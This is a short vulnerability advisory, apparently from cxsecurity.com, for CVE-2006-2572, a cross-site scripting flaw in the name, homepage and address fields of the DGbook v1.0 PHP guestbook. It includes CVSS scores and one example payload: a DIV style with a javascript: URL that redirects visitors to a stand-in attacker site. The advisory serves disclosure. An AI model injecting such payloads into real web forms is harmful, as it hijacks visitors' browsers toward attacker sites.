DGbook v1.0 - XSS

Published
Credit
Risk
2006.05.25
luny youfucktard com
Low
CWE
CVE
Local
Remote
CWE-79
CVE-2006-2572
No
Yes

CVSS Base Score
Impact Subscore
Exploitability Subscore
2.6/10
2.9/10
4.9/10
Exploit range
Attack complexity
Authentication
Remote
High
No required
Confidentiality impact
Integrity impact
Availability impact
None
Partial
None

DGbook v1.0 - XSS

Homepage:

http://www.diangemilang.com/dgscripts.php

Description:

This is Guestbook script, write on PHP from Dian Gemilang. Feature: Field validation, Limit character, Charecter filtering - This feature will remove "<" and ">" character, so user can't input HTML tag -, Auto Focus - This feature will make user cursor on the first form field - It's easy to install. Requare PHP, MYQL and phpmyadmin for dump the database.

Effected files:

Name, homepage, and address input boxes on index.php

XSS Vuln:

< and > may be filtered however, they are not filtered in the name, homepage and address text boxes. Only in the comment box.

Example of putting html code in the name & address box:

<DIV STYLE="background-image: url(javascript:window.location('http://www.evilsite.com'))">


See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2015, cxsecurity.com